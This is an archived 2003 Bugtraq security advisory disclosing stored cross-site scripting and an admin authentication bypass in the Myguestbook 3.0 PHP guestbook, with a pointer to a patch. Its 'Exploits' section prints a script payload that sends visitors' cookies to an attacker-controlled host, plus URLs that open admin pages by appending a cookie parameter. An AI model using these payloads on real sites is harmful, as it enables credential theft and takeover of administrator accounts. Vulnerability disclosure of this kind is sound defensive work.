[28970] in bugtraq
Myguestbook (PHP)
daemon@ATHENA.MIT.EDU (Frog Man)
Fri Feb 21 17:08:21 2003
From: "Frog Man" <leseulfrog@hotmail.com>
To: bugtraq@securityfocus.com
Date: Fri, 21 Feb 2003 08:02:58 +0100
Mime-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1; format=flowed
Message-ID: <F10AoAL06yg79EoFx4v000066b2@hotmail.com>
Informations :
°°°°°°°°°°°°°°
Version : 3.0
Website : http://www.tefonline.net/
Problems :
- XSS -> admin infos recovery
- Access to admin pages
PHP Code/Location :
°°°°°°°°°°°°°°°°°°°
If pseudo = [SCRIPT],
e-mail = >[SCRIPT]
or message = </textarea>[SCRIPT]
[SCRIPT] will be executed on index.php, /admin/user_modif.php,
/admin/admin_modif.php and /admin/admin_suppr.php .
/admin/confirm_connect.php :
---------------------------------------------
SetCookie("Myguestbook","$name:$password");
---------------------------------------------
/admin/admin_pass.php, /admin/admin_index.php, /admin/admin_modif.php and
/admin/admin_suppr.php :
--------------------------------------------------------------------
<?
if(!isset($Myguestbook))
header("location:../index.php?MSG=permis");
?>
--------------------------------------------------------------------
Exploits :
°°°°°°°°°°
[SCRIPT] :
<script>
location='http://[attacker]/file.php?'+document.cookie;
</script>
http://[target]/admin/admin_index.php?Myguestbook=1
http://[target]/admin/admin_pass.php?Myguestbook=1
http://[target]/admin/admin_modif.php?Myguestbook=1
http://[target]/admin/admin_suppr.php?Myguestbook=1
http://[target]/admin/user_modif.php?id=[MESSAGEID]
Solution :
°°°°°°°°°°
A patch can be found on http://www.phpsecure.org.
More Details :
°°°°°°°°°°°°°°
In French :
http://www.frog-man.org/tutos/Myguestbook.txt
Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FMyguestbook.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools
frog-m@n
_________________________________________________________________
